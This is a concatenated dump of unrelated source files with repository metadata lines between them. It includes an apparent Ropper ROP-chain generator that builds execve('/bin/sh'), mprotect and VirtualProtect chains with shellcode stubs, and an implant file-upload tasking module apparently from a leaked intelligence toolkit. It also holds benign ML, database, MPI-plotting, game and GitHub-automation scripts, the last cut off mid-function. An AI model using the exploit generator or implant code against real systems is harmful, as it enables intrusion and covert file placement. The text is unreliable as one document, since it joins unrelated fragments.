r = Ropper(self._binaries[0])
gadgets = []
for section in self._binaries[0].executableSections:
vaddr = section.virtualAddress
gadgets.extend(
r.searchOpcode(section.bytes, opcode.decode('hex'), section.offset, True, section=section))
if len(gadgets) > 0:
return gadgets[0]
else:
            raise RopChainError('Cannot create gadget for opcode: %s' % opcode)
def create(self):
pass
class RopChainX86System(RopChainX86):
@classmethod
def name(cls):
return 'execve'
def _createCommand(self, what, where, reg=None, dontModify=[], idx=0):
if len(what) % 4 > 0:
what = '/' * (4 - len(what) % 4) + what
return self._createWriteStringWhere(what,where, idx=idx)
def create(self, cmd='/bin/sh'):
if len(cmd.split(' ')) > 1:
raise RopChainError('No argument support for execve commands')
self._printer.printInfo('ROPchain Generator for syscall execve:\n')
self._printer.println('\nwrite command into data section\neax 0xb\nebx address to cmd\necx address to null\nedx address to null\n')
section = self._binaries[0].getSection(b'.data')
length = math.ceil(float(len(cmd))/4) * 4
chain = self._printHeader()
chain_tmp = '\n'
chain_tmp += self._createCommand(cmd,section.struct.sh_offset+0x1000)[0]
badregs = []
while True:
ret = self._createNumber(0x0, badRegs=badregs)
chain_tmp += ret[0]
try:
chain_tmp += self._createWriteRegValueWhere(ret[1], section.struct.sh_offset+0x1000+length)[0]
break
            except RopChainError:
                badregs.append(ret[1])
gadgets = []
gadgets.append((self._createAddress, [section.struct.sh_offset+0x1000],{'reg':'ebx'},['ebx', 'bx', 'bl', 'bh']))
gadgets.append((self._createAddress, [section.struct.sh_offset+0x1000+length],{'reg':'ecx'},['ecx', 'cx', 'cl', 'ch']))
gadgets.append((self._createAddress, [section.struct.sh_offset+0x1000+length],{'reg':'edx'},['edx', 'dx', 'dl', 'dh']))
gadgets.append((self._createNumber, [0xb],{'reg':'eax'},['eax', 'ax', 'al', 'ah']))
        self._printer.printInfo('Try to create chain which fills registers without deleting the content of previously filled registers')
chain_tmp += self._createDependenceChain(gadgets)
try:
self._printer.printInfo('Look for syscall gadget')
chain_tmp += self._createSyscall()[0]
self._printer.printInfo('syscall gadget found')
except RopChainError:
try:
self._printer.printInfo('No syscall gadget found!')
self._printer.printInfo('Look for int 0x80 opcode')
chain_tmp += self._createOpcode('cd80')
self._printer.printInfo('int 0x80 opcode found')
except:
try:
self._printer.printInfo('No int 0x80 opcode found')
self._printer.printInfo('Look for call gs:[0x10] opcode')
chain_tmp += self._createOpcode('65ff1510000000')
self._printer.printInfo('call gs:[0x10] found')
except RopChainError:
self._printer.printInfo('No call gs:[0x10] opcode found')
chain += self._printRebase()
chain += 'rop = \'\'\n'
chain += chain_tmp
chain += 'print rop'
print(chain)
class RopChainX86Mprotect(RopChainX86):
"""
Builds a ropchain for mprotect syscall
    eax 0x7d
ebx address
ecx size
edx 0x7 -> RWE
"""
@classmethod
def name(cls):
return 'mprotect'
def _createJmp(self, reg='esp'):
r = Ropper(self._binaries[0])
gadgets = []
for section in self._binaries[0].executableSections:
vaddr = section.virtualAddress
gadgets.extend(
r.searchJmpReg(section.bytes, reg, vaddr, section=section))
if len(gadgets) > 0:
if (gadgets[0]._binary, gadgets[0]._section) not in self._usedBinaries:
self._usedBinaries.append((gadgets[0]._binary, gadgets[0]._section))
return self._printRopInstruction(gadgets[0])
else:
return None
def __extract(self, param):
        if not (match('0x[0-9a-fA-F]{1,8},0x[0-9a-fA-F]+', param) or match('0x[0-9a-fA-F]{1,8},[0-9]+', param)):
            raise RopChainError('Parameter has to have the following format: <hexnumber>,<hexnumber> or <hexnumber>,<number>')
split = param.split(',')
if isHex(split[1]):
return (int(split[0], 16), int(split[1], 16))
else:
return (int(split[0], 16), int(split[1], 10))
def create(self, param=None):
if not param:
raise RopChainError('Missing parameter: address:size')
address, size = self.__extract(param)
self._printer.printInfo('ROPchain Generator for syscall mprotect:\n')
        self._printer.println('eax 0x7d\nebx address\necx size\nedx 0x7 -> RWE\n')
chain = self._printHeader()
chain += 'shellcode = \'\\xcc\'*100\n\n'
gadgets = []
gadgets.append((self._createNumber, [address],{'reg':'ebx'},['ebx', 'bx', 'bl', 'bh']))
gadgets.append((self._createNumber, [size],{'reg':'ecx'},['ecx', 'cx', 'cl', 'ch']))
gadgets.append((self._createNumber, [0x7],{'reg':'edx'},['edx', 'dx', 'dl', 'dh']))
gadgets.append((self._createNumber, [0x7d],{'reg':'eax'},['eax', 'ax', 'al', 'ah']))
        self._printer.printInfo('Try to create chain which fills registers without deleting the content of previously filled registers')
chain_tmp = ''
chain_tmp += self._createDependenceChain(gadgets)
try:
self._printer.printInfo('Look for syscall gadget')
chain_tmp += self._createSyscall()[0]
self._printer.printInfo('syscall gadget found')
except RopChainError:
chain_tmp += '\n# ADD HERE SYSCALL GADGET\n\n'
self._printer.printInfo('No syscall gadget found!')
self._printer.printInfo('Look for jmp esp')
jmp_esp = self._createJmp()
if jmp_esp:
self._printer.printInfo('jmp esp found')
chain_tmp += jmp_esp
else:
            self._printer.printInfo('no jmp esp found')
chain_tmp += '\n# ADD HERE JMP ESP\n\n'
chain += self._printRebase()
chain += '\nrop = \'\'\n'
chain += chain_tmp
chain += 'rop += shellcode\n\n'
chain += 'print(rop)\n'
print(chain)
class RopChainX86VirtualProtect(RopChainX86):
"""
Builds a ropchain for a VirtualProtect call using pushad
eax 0x90909090
ecx old protection (writable addr)
edx 0x40 (RWE)
ebx size
esp address
ebp return address (jmp esp)
esi pointer to VirtualProtect
edi ret (rop nop)
"""
@classmethod
def name(cls):
return 'virtualprotect'
def _createPushad(self):
pushad = self._find(Category.PUSHAD)
if pushad:
return self._printRopInstruction(pushad)
else:
self._printer.printInfo('No pushad found!')
return '# Add here PUSHAD gadget!'
def _createJmp(self, reg='esp'):
r = Ropper(self._binaries[0])
gadgets = []
for section in self._binaries[0].executableSections:
vaddr = section.offset
gadgets.extend(
r.searchJmpReg(section.bytes, reg, vaddr, section=section))
if len(gadgets) > 0:
if (gadgets[0]._binary, gadgets[0]._section) not in self._usedBinaries:
self._usedBinaries.append((gadgets[0]._binary, gadgets[0]._section))
return gadgets[0]
else:
return ''
def __extract(self, param):
if (not match('0x[0-9a-fA-F]{1,8},0x[0-9a-fA-F]+', param)) and (not match('0x[0-9a-fA-F]+', param)):
            raise RopChainError('Parameter has to have the following format: <hexnumber>,<hexnumber> or <hexnumber>')
split = param.split(',')
if len(split) == 2:
if isHex(split[1]):
return (int(split[0], 16), int(split[1], 16))
else:
return (None, int(split[0], 16))
def __getVirtualProtectEntry(self):
for binary in self._binaries:
if binary.type == Type.PE:
s = binary.sections['.idata']
for descriptorData in s.importDescriptorTable:
for function in descriptorData.functions:
if str(function[1]) == 'VirtualProtect':
return function[2]
else:
self._printer.printError('File is not a PE file.')
return None
def create(self, param=None):
if not param:
raise RopChainError('Missing parameter: address,size or size')
self._printer.printInfo('Ropchain Generator for VirtualProtect:\n')
self._printer.println('eax 0x90909090\necx old protection (writable addr)\nedx 0x40 (RWE)\nebx size\nesp address\nebp return address (jmp esp)\nesi pointer to VirtualProtect\nedi ret (rop nop)\n')
address, size = self.__extract(param)
given = False
if not address:
address = self.__getVirtualProtectEntry()
if not address:
self._printer.printError('No IAT-Entry for VirtualProtect found!')
raise RopChainError('No IAT-Entry for VirtualProtect found and no address is given')
else:
given = True
writeable_ptr = self._binaries[0].getWriteableSection().offset + 0x4
jmp_esp = self._createJmp()
ret_addr = self._searchOpcode('c3')
chain = self._printHeader()
chain += '\n\nshellcode = \'\\xcc\'*100\n\n'
gadgets = []
to_extend = []
chain_tmp = ''
try:
self._printer.printInfo('Try to create gadget to fill esi with content of IAT address: %s' % address)
chain_tmp += self._createLoadRegValueFrom('esi', address)[0]
if given:
gadgets.append((self._createNumber, [address],{'reg':'eax'},['eax', 'ax', 'ah', 'al','esi','si']))
else:
gadgets.append((self._createAddress, [address],{'reg':'eax'},['eax', 'ax', 'ah', 'al','esi','si']))
to_extend = ['esi','si']
except:
self._printer.printInfo('Cannot create fill esi gadget!')
self._printer.printInfo('Try to create this chain:\n')
self._printer.println('eax Pointer to VirtualProtect\necx old protection (writable addr)\nedx 0x40 (RWE)\nebx size\nesp address\nebp return address (jmp esp)\nesi pointer to jmp [eax]\nedi ret (rop nop)\n')
jmp_eax = self._searchOpcode('ff20') # jmp [eax]
gadgets.append((self._createAddress, [jmp_eax.lines[0][0]],{'reg':'esi'},['esi','si']))
if given:
gadgets.append((self._createNumber, [address],{'reg':'eax'},['eax', 'ax', 'ah', 'al']))
else:
gadgets.append((self._createAddress, [address],{'reg':'eax'},['eax', 'ax', 'ah', 'al']))
gadgets.append((self._createNumber, [size],{'reg':'ebx'},['ebx', 'bx', 'bl', 'bh']+to_extend))
gadgets.append((self._createAddress, [writeable_ptr],{'reg':'ecx'},['ecx', 'cx', 'cl', 'ch']+to_extend))
gadgets.append((self._createAddress, [jmp_esp.lines[0][0]],{'reg':'ebp'},['ebp', 'bp']+to_extend))
gadgets.append((self._createNumber, [0x40],{'reg':'edx'},['edx', 'dx', 'dh', 'dl']+to_extend))
gadgets.append((self._createAddress, [ret_addr.lines[0][0]],{'reg':'edi'},['edi', 'di']+to_extend))
        self._printer.printInfo('Try to create chain which fills registers without deleting the content of previously filled registers')
chain_tmp += self._createDependenceChain(gadgets)
self._printer.printInfo('Look for pushad gadget')
chain_tmp += self._createPushad()
chain += self._printRebase()
chain += 'rop = \'\'\n'
chain += chain_tmp
chain += 'rop += shellcode\n\n'
chain += 'print(rop)\n'
print(chain)
|
gpl-2.0
| -8,572,569,844,129,845,000
| 39.707537
| 218
| 0.562022
| false
| 3.858925
| false
| false
| false
|
myfavouritekk/TPN
|
tools/propagate/regression_propagation.py
|
1
|
6216
|
#!/usr/bin/env python
# --------------------------------------------------------
# Test regression propagation on ImageNet VID video
# Modified by Kai KANG (myfavouritekk@gmail.com)
# --------------------------------------------------------
"""Test a Fast R-CNN network on an image database."""
import argparse
import pprint
import time
import os
import os.path as osp
import sys
import cPickle
import numpy as np
this_dir = osp.dirname(__file__)
# add caffe-mpi path
sys.path.insert(0, osp.join(this_dir, '../../external/caffe-mpi/build/install/python'))
import caffe
# add py-faster-rcnn paths
sys.path.insert(0, osp.join(this_dir, '../../external/py-faster-rcnn/lib'))
from fast_rcnn.craft import im_detect
from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list
# add external libs
sys.path.insert(0, osp.join(this_dir, '../../external'))
from vdetlib.utils.protocol import proto_load, proto_dump
# add src libs
sys.path.insert(0, osp.join(this_dir, '../../src'))
from tpn.propagate import roi_propagation
from tpn.target import add_track_targets
from tpn.data_io import save_track_proto_to_zip
def parse_args():
"""
Parse input arguments
"""
parser = argparse.ArgumentParser(description='Test a Fast R-CNN network')
parser.add_argument('vid_file')
parser.add_argument('box_file')
parser.add_argument('save_file', help='Save zip file')
parser.add_argument('--annot_file', default=None,
help='Ground truth annotation file. [None]')
parser.add_argument('--job', dest='job_id', help='Job slot, GPU ID + 1. [1]',
default=1, type=int)
parser.add_argument('--def', dest='prototxt',
help='prototxt file defining the network',
default=None, type=str)
parser.add_argument('--param', dest='caffemodel',
help='model to test',
default=None, type=str)
parser.add_argument('--cfg', dest='cfg_file',
help='optional config file', default=None, type=str)
parser.add_argument('--set', dest='set_cfgs',
help='set config keys', default=None,
nargs=argparse.REMAINDER)
parser.add_argument('--num_dets', dest='max_per_image',
help='max number of detections per image',
default=100, type=int)
parser.add_argument('--num_per_batch', dest='boxes_num_per_batch',
help='split boxes to batches. [32]',
default=32, type=int)
parser.add_argument('--bbox_mean', dest='bbox_mean',
help='the mean of bbox',
default=None, type=str)
parser.add_argument('--bbox_std', dest='bbox_std',
help='the std of bbox',
default=None, type=str)
parser.add_argument('--bbox_pred_layer', dest='bbox_pred_layer',
help='Layer name for bbox regression layer in feature net.',
default='bbox_pred_vid', type=str)
parser.add_argument('--scheme', help='Propagation scheme. [weighted]',
choices=['max', 'mean', 'weighted'], default='weighted')
parser.add_argument('--length', type=int, default=9,
help='Propagation length. [9]')
parser.add_argument('--sample_rate', type=int, default=1,
help='Temporal subsampling rate. [1]')
parser.add_argument('--offset', type=int, default=0,
help='Offset of sampling. [0]')
parser.add_argument('--wait', dest='wait',
help='wait until net file exists',
default=True, type=bool)
parser.add_argument('--gpus', nargs='+', default=None, type=int, help='Available GPUs.')
parser.add_argument('--zip', action='store_true',
help='Save as zip files rather than track protocols')
parser.add_argument('--keep_feat', action='store_true',
help='Keep feature.')
parser.set_defaults(vis=False, zip=False, keep_feat=False)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
if __name__ == '__main__':
args = parse_args()
print 'Called with args:'
print args
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
if args.set_cfgs is not None:
cfg_from_list(args.set_cfgs)
cfg.GPU_ID = args.job_id - 1
print 'Using config:'
pprint.pprint(cfg)
while not os.path.exists(args.caffemodel) and args.wait:
print 'Waiting for {} to exist...'.format(args.caffemodel)
time.sleep(10)
caffe.set_mode_gpu()
if args.gpus is None:
caffe.set_device(args.job_id - 1)
else:
assert args.job_id <= len(args.gpus)
caffe.set_device(args.gpus[args.job_id-1])
net = caffe.Net(args.prototxt, args.caffemodel, caffe.TEST)
net.name = os.path.splitext(os.path.basename(args.caffemodel))[0]
# apply bbox regression normalization on the net weights
with open(args.bbox_mean, 'rb') as f:
bbox_means = cPickle.load(f)
with open(args.bbox_std, 'rb') as f:
bbox_stds = cPickle.load(f)
net.params[args.bbox_pred_layer][0].data[...] = \
net.params[args.bbox_pred_layer][0].data * bbox_stds[:, np.newaxis]
net.params[args.bbox_pred_layer][1].data[...] = \
net.params[args.bbox_pred_layer][1].data * bbox_stds + bbox_means
vid_proto = proto_load(args.vid_file)
box_proto = proto_load(args.box_file)
track_proto = roi_propagation(vid_proto, box_proto, net, im_detect, scheme=args.scheme,
length=args.length, sample_rate=args.sample_rate,
keep_feat=args.keep_feat, batch_size=args.boxes_num_per_batch)
# add ground truth targets if annotation file is given
if args.annot_file is not None:
annot_proto = proto_load(args.annot_file)
add_track_targets(track_proto, annot_proto)
if args.zip:
save_track_proto_to_zip(track_proto, args.save_file)
else:
proto_dump(track_proto, args.save_file)
|
mit
| 8,607,709,763,917,852,000
| 38.341772
| 92
| 0.591055
| false
| 3.632963
| false
| false
| false
|
TunnelBlanket/Houdini
|
Houdini/Data/Stamp.py
|
1
|
1225
|
# coding: utf-8
from sqlalchemy import Column, Integer, SmallInteger, text, ForeignKey
from sqlalchemy.orm import relationship
from Houdini.Data import Base
metadata = Base.metadata
class Stamp(Base):
__tablename__ = 'stamp'
PenguinID = Column(ForeignKey(u'penguin.ID', ondelete=u'CASCADE', onupdate=u'CASCADE'), primary_key=True, nullable=False)
Stamp = Column(SmallInteger, primary_key=True, nullable=False)
Recent = Column(Integer, nullable=False, server_default=text("1"))
penguin = relationship(u'Penguin')
class CoverStamp(Base):
__tablename__ = 'cover_stamps'
PenguinID = Column(ForeignKey(u'penguin.ID', ondelete=u'CASCADE', onupdate=u'CASCADE'), primary_key=True, nullable=False)
Stamp = Column(SmallInteger, primary_key=True, nullable=False, server_default=text("0"))
X = Column(SmallInteger, nullable=False, server_default=text("0"))
Y = Column(SmallInteger, nullable=False, server_default=text("0"))
Type = Column(SmallInteger, nullable=False, server_default=text("0"))
Rotation = Column(SmallInteger, nullable=False, server_default=text("0"))
Depth = Column(SmallInteger, nullable=False, server_default=text("0"))
penguin = relationship(u'Penguin')
|
mit
| -1,121,676,306,723,954,800
| 41.275862
| 125
| 0.726531
| false
| 3.431373
| false
| false
| false
|
Crompulence/cpl-library
|
examples/interactive_plot_example/python/CFD_recv_and_plot_grid_interactive.py
|
1
|
3724
|
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.widgets import Slider
from mpi4py import MPI
from cplpy import CPL
from draw_grid import draw_grid
#initialise MPI and CPL
comm = MPI.COMM_WORLD
CPL = CPL()
CFD_COMM = CPL.init(CPL.CFD_REALM)
nprocs_realm = CFD_COMM.Get_size()
# Parameters of the cpu topology (cartesian grid)
npxyz = np.array([1, 1, 1], order='F', dtype=np.int32)
NProcs = np.prod(npxyz)
xyzL = np.array([10.0, 10.0, 10.0], order='F', dtype=np.float64)
xyz_orig = np.array([0.0, 0.0, 0.0], order='F', dtype=np.float64)
ncxyz = np.array([16, 6, 16], order='F', dtype=np.int32)
if (nprocs_realm != NProcs):
print("Non-coherent number of processes in CFD ", nprocs_realm,
" no equal to ", npxyz[0], " X ", npxyz[1], " X ", npxyz[2])
MPI.Abort(errorcode=1)
#Setup coupled simulation
cart_comm = CFD_COMM.Create_cart([npxyz[0], npxyz[1], npxyz[2]])
CPL.setup_cfd(cart_comm, xyzL, xyz_orig, ncxyz)
#Plot output
fig, ax = plt.subplots(1,1)
plt.subplots_adjust(bottom=0.25)
axslider = plt.axes([0.25, 0.1, 0.65, 0.03])
freq = 1.
sfreq = Slider(axslider, 'Freq', 0.1, 2.0, valinit=freq)
def update(val):
    global freq
    freq = sfreq.val
    print("CHANGED", freq)
sfreq.on_changed(update)
plt.ion()
plt.show()
# === Plot both grids ===
dx = CPL.get("xl_cfd")/float(CPL.get("ncx"))
dy = CPL.get("yl_cfd")/float(CPL.get("ncy"))
dz = CPL.get("zl_cfd")/float(CPL.get("ncz"))
ioverlap = (CPL.get("icmax_olap")-CPL.get("icmin_olap")+1)
joverlap = (CPL.get("jcmax_olap")-CPL.get("jcmin_olap")+1)
koverlap = (CPL.get("kcmax_olap")-CPL.get("kcmin_olap")+1)
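# physical extent of the overlap region: number of overlapping cells times
# the CFD cell size in each direction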
xoverlap = ioverlap*dx
yoverlap = joverlap*dy
zoverlap = koverlap*dz
for time in range(100000):
# recv data to plot
olap_limits = CPL.get_olap_limits()
portion = CPL.my_proc_portion(olap_limits)
[ncxl, ncyl, nczl] = CPL.get_no_cells(portion)
recv_array = np.zeros((1, ncxl, ncyl, nczl), order='F', dtype=np.float64)
recv_array, ierr = CPL.recv(recv_array, olap_limits)
#Plot CFD and coupler Grid
draw_grid(ax,
nx=CPL.get("ncx"),
ny=CPL.get("ncy"),
nz=CPL.get("ncz"),
px=CPL.get("npx_cfd"),
py=CPL.get("npy_cfd"),
pz=CPL.get("npz_cfd"),
xmin=CPL.get("x_orig_cfd"),
ymin=CPL.get("y_orig_cfd"),
zmin=CPL.get("z_orig_cfd"),
xmax=(CPL.get("icmax_olap")+1)*dx,
ymax=CPL.get("yl_cfd"),
zmax=(CPL.get("kcmax_olap")+1)*dz,
lc = 'r',
label='CFD')
#Plot MD domain
draw_grid(ax, nx=1, ny=1, nz=1,
px=CPL.get("npx_md"),
py=CPL.get("npy_md"),
pz=CPL.get("npz_md"),
xmin=CPL.get("x_orig_md"),
ymin=-CPL.get("yl_md")+yoverlap,
zmin=CPL.get("z_orig_md"),
xmax=(CPL.get("icmax_olap")+1)*dx,
ymax=yoverlap,
zmax=(CPL.get("kcmax_olap")+1)*dz,
label='MD')
#Plot x component on grid
x = np.linspace(CPL.get("x_orig_cfd")+.5*dx,xoverlap-.5*dx,ioverlap)
z = np.linspace(CPL.get("z_orig_cfd")+.5*dz,zoverlap-.5*dz,koverlap)
for j in range(joverlap):
ax.plot(x, 0.5*dy*(recv_array[0,:,j,0]+1.+2*j), 's-')
ax.set_xlabel('$x$')
ax.set_ylabel('$y$')
print(time, freq)
plt.pause(0.1)
ax.cla()
# send data to update
olap_limits = CPL.get_olap_limits()
portion = CPL.my_proc_portion(olap_limits)
[ncxl, ncyl, nczl] = CPL.get_no_cells(portion)
send_array = freq*np.ones((1, ncxl, ncyl, nczl), order='F', dtype=np.float64)
CPL.send(send_array, olap_limits)
CPL.finalize()
MPI.Finalize()
|
gpl-3.0
| 4,246,740,477,422,610,000
| 30.033333
| 81
| 0.583512
| false
| 2.528174
| false
| false
| false
|
DarthMaulware/EquationGroupLeaks
|
Leak #5 - Lost In Translation/windows/Resources/Dsz/PyScripts/Tasking/Mcl_Cmd_Put_Tasking.py
|
1
|
6883
|
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: Mcl_Cmd_Put_Tasking.py
UPLOADS_DIR = 'Uploads'
MAX_CHUNK_SIZE = 1047552
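# 1047552 bytes == 1 MiB - 1 KiB; presumably leaves headroom for protocol
# overhead around each chunk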
def TaskingMain(namespace):
import mcl.imports
import mcl.target
import mcl.tasking
import mcl.tasking.env
import mcl.tasking.resource
import mcl.tasking.technique
import mcl.tasking.virtualdir
from mcl.object.Message import MarshalMessage
mcl.imports.ImportWithNamespace(namespace, 'mca.file.cmd.put', globals())
mcl.imports.ImportWithNamespace(namespace, 'mca.file.cmd.put.tasking', globals())
lpParams = mcl.tasking.GetParameters()
if lpParams['chunksize'] == 0 or lpParams['chunksize'] >= MAX_CHUNK_SIZE:
mcl.tasking.OutputError('Invalid chunkSize given')
return False
else:
provider = mcl.tasking.technique.Lookup('PUT', mcl.tasking.technique.TECHNIQUE_MCL_NTNATIVEAPI, lpParams['method'])
if lpParams['source'] == None or len(lpParams['source']) == 0:
mcl.tasking.OutputError('No local file given')
return False
local = lpParams['source']
if lpParams['remote'] == None or len(lpParams['remote']) == 0:
if local.find('\\') != -1 or local.find('/') != -1:
mcl.tasking.OutputError('You must specify a remote file name if you specify a path for the local file')
return False
remote = local
else:
remote = lpParams['remote']
resFlags = 0
resFlags |= mcl.tasking.resource.OPEN_RES_FLAG_USE_ARCH
resFlags |= mcl.tasking.resource.OPEN_RES_FLAG_USE_OS
resFlags |= mcl.tasking.resource.OPEN_RES_FLAG_USE_LIBC
if lpParams['compiled']:
resFlags |= mcl.tasking.resource.OPEN_RES_FLAG_USE_COMPILED
f, openedName, usedProject = mcl.tasking.resource.Open(local, resFlags, UPLOADS_DIR, lpParams['project'])
if f == None:
mcl.tasking.OutputError("Failed to open local file '%s'" % local)
return False
try:
import os.path
import array
fileSize = os.path.getsize(openedName)
if fileSize == 0 or fileSize > 4294967295:
mcl.tasking.OutputError("Invalid file size (%u) for put of '%s'" % (fileSize, openedName))
return False
taskXml = mcl.tasking.Tasking()
taskXml.AddProvider(mcl.tasking.technique.TECHNIQUE_MCL_NTNATIVEAPI, provider)
mcl.tasking.OutputXml(taskXml.GetXmlObject())
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('PutFile')
xml.AddAttribute('name', openedName)
xml.AddAttribute('size', '%u' % fileSize)
mcl.tasking.OutputXml(xml)
fileBytes = array.array('B', f.read())
if len(fileBytes) != fileSize:
mcl.tasking.OutputError('Failed to read file (read=%u | expected=%u)' % (len(fileBytes), fileSize))
return False
mcl.tasking.env.SetValue(mca.file.cmd.put.LP_ENV_PUT_COMPLETE, 'false')
mcl.tasking.env.SetValue(mca.file.cmd.put.LP_ENV_BYTES_LEFT, '%u' % fileSize)
mcl.tasking.env.SetValue(mca.file.cmd.put.LP_ENV_FILE_SIZE, '%u' % fileSize)
mcl.tasking.env.SetValue(mca.file.cmd.put.LP_ENV_FILE_OPENED, 'false')
mcl.tasking.env.SetValue(mca.file.cmd.put.LP_ENV_ERROR_ENCOUNTERED, 'false')
finally:
f.close()
f = None
createParams = mca.file.cmd.put.CreateParams()
createParams.writeOffset = 0
createParams.provider = provider
if lpParams['permanent']:
createParams.flags |= mca.file.cmd.put.PARAMS_CREATE_FLAG_PERMANENT
try:
createParams.filePath = mcl.tasking.virtualdir.GetFullPath(remote)
except:
mcl.tasking.OutputError('Failed to apply virtual directory to remote name')
return False
rpc = mca.file.cmd.put.tasking.RPC_INFO_CREATE
msg = MarshalMessage()
createParams.Marshal(msg)
rpc.SetData(msg.Serialize())
rpc.SetMessagingType('message')
res = mcl.tasking.RpcPerformCall(rpc)
if res != mcl.target.CALL_SUCCEEDED:
mcl.tasking.RecordModuleError(res, 0, mca.file.cmd.put.errorStrings)
return False
import time
while not mcl.tasking.env.IsTrue(mca.file.cmd.put.LP_ENV_FILE_OPENED):
if mcl.CheckForStop() or mcl.tasking.env.IsTrue(mca.file.cmd.put.LP_ENV_ERROR_ENCOUNTERED):
return False
time.sleep(1)
chunkIndex = 0
bytesLeft = fileSize
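        # Send the file in chunks of at most lpParams['chunksize'] bytes,
        # waiting after each write until the target reports the reduced
        # byte count before sending the next chunk.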
while bytesLeft > 0:
if mcl.CheckForStop() or mcl.tasking.env.IsTrue(mca.file.cmd.put.LP_ENV_ERROR_ENCOUNTERED):
return False
numBytesToSend = bytesLeft
if numBytesToSend > lpParams['chunksize']:
numBytesToSend = lpParams['chunksize']
startIndex = fileSize - bytesLeft
endIndex = startIndex + numBytesToSend
writeParams = mca.file.cmd.put.WriteParams()
writeParams.data = fileBytes[startIndex:endIndex]
writeParams.chunkIndex = chunkIndex
if numBytesToSend >= bytesLeft:
writeParams.lastData = True
chunkIndex = chunkIndex + 1
rpc = mca.file.cmd.put.tasking.RPC_INFO_WRITE
msg = MarshalMessage()
writeParams.Marshal(msg)
rpc.SetData(msg.Serialize())
rpc.SetMessagingType('message')
res = mcl.tasking.RpcPerformCall(rpc)
if res != mcl.target.CALL_SUCCEEDED:
mcl.tasking.RecordModuleError(res, 0, mca.file.cmd.put.errorStrings)
return False
newBytesLeft = bytesLeft
while newBytesLeft == bytesLeft:
if mcl.CheckForStop() or mcl.tasking.env.IsTrue(mca.file.cmd.put.LP_ENV_ERROR_ENCOUNTERED):
return False
time.sleep(1)
newBytesLeft = int(mcl.tasking.env.GetValue(mca.file.cmd.put.LP_ENV_BYTES_LEFT))
bytesLeft = newBytesLeft
while not mcl.tasking.env.IsTrue(mca.file.cmd.put.LP_ENV_PUT_COMPLETE):
if mcl.CheckForStop() or mcl.tasking.env.IsTrue(mca.file.cmd.put.LP_ENV_ERROR_ENCOUNTERED):
return False
time.sleep(1)
if not lpParams['permanent']:
mcl.tasking.TaskGoToBackground()
while not mcl.CheckForStop():
time.sleep(1)
return mcl.tasking.TaskSetStatus(mcl.target.CALL_SUCCEEDED)
if __name__ == '__main__':
import sys
if TaskingMain(sys.argv[1]) != True:
sys.exit(-1)
|
unlicense
| -8,070,547,693,328,371,000
| 44.289474
| 123
| 0.611361
| false
| 3.531555
| false
| false
| false
|
helewonder/knightgame
|
wargame/game.py
|
1
|
3956
|
from hut import Hut, create_unit
from functions import print_bold, print_dotted_line, show_health, \
print_wave_line
from knight import Knight
from uniterror import HutNotNumberError, HutOutRangeError
class OrGame():
"""
    The Game class: sets up the huts and the player and runs the play loop.
"""
def __init__(self, hut_numbers=5):
"""get the game ready with scenario ready, default have 5huts.
:param hut_numbers: in the game, how many huts
:type hut_numbers: int
"""
self.acquired_all_huts = False
self.huts = []
self.player = None
self.hut_numbers = hut_numbers
@property
def get_occupants(self):
"""Show all huts with it's occupant
:return: the message each hut with occupant
:rtype: basestring
"""
msg = "["
for hut in self.huts:
msg += str(hut.number) + ":" + hut.get_occupant_type + ", "
msg += '\b\b]'
return msg
def _process_user_choice(self):
verifying_choice = True
idx = 0
print_dotted_line()
print("Current Occupants:\n\t%s" % self.get_occupants)
print_dotted_line()
while verifying_choice:
user_choice = input(
"Choose a hut number to enter(1~" + str(
self.hut_numbers) + "):")
try:
if not user_choice.isdigit():
raise HutNotNumberError(
"Your input '{}' is not number.".format(user_choice))
idx = int(user_choice)
                if idx > self.hut_numbers or idx < 1:
raise HutOutRangeError(
"input not in range(1~" + str(self.hut_numbers) + ")")
            except (HutNotNumberError, HutOutRangeError) as e:
                print_wave_line()
                print(e)
                print(e.error_message)
                print_wave_line()
                continue
if self.huts[idx - 1].is_acquired:
print(
"You have already acquired this hut. Try again",
"<Info:You can NOT get healed in already acquired hut.>"
)
else:
verifying_choice = False
return idx
def play(self):
"""
Workhorse method to play the game....
Create a Knight instance, create huts and preoccupy them with a game
Character instance (or leave empty)
"""
self.setup_game_scenario()
while not self.acquired_all_huts:
idx = self._process_user_choice()
self.player.acquire_hut(self.huts[idx - 1])
if self.player.health_meter <= 0:
print("You Lose :( Better luck next time")
break
for hut in self.huts:
if not hut.is_acquired:
break
else:
self.acquired_all_huts = True
if self.acquired_all_huts:
print_bold("You Win!!! Congratulations!!!!!!")
def setup_game_scenario(self):
"""
Create player and huts and then randomly pre-occupy huts...
"""
self.player = Knight("Sir Foo")
for number in range(self.hut_numbers):
self.huts.append(Hut(number + 1, create_unit()))
self._show_mission()
# print_bold("Current Occupants:", self.get_occupants)
show_health(self.player, bold=True, end='\n')
@staticmethod
def _show_mission():
print_dotted_line()
print_bold("Welcome to Play the Knight Game!", end='\n')
print_dotted_line()
print_bold("Mission:")
print("\t1. Defeat the enemy in any hut")
print("\t2. Bring all huts in the village under your contral")
|
mit
| -2,352,176,094,657,368,000
| 30.903226
| 78
| 0.523509
| false
| 4.016244
| false
| false
| false
|
Mach33Labs/labautomation
|
github.py
|
1
|
5717
|
#!/usr/bin/python
import datetime
import fcntl
import github3
import gzip
import json
import os
import re
import select
import socket
import subprocess
import sys
import time
import mysql.connector
TARGET_VM = 'devosa'
TARGET_IP_BLOCK = '192.168.53.0/24'
with open(os.path.expanduser('~/.github_automation'), 'r') as f:
config = json.loads(f.read())
ISSUE_URL_RE = re.compile('https://api.github.com/repos/(.*)/(.*)/issues/(.*)')
def github_comment(issue_url, comment):
if not issue_url:
return
g = github3.login(config['github_user'], config['github_password'])
m = ISSUE_URL_RE.match(issue_url)
if not m:
print 'Could not parse issue URL!'
return
issue = g.issue(m.group(1), m.group(2), int(m.group(3)))
issue.create_comment(comment)
def process(job):
ostrich_sha = job['sha']
if job['project'] != 'ostrich':
ostrich_sha = 'master'
state = {}
with open('state.json.%s' % job['flavour'], 'r') as f:
state = json.loads(f.read())
state['complete']['osa-branch'] = job['branch']
state['complete']['ironic-ip-block'] = TARGET_IP_BLOCK
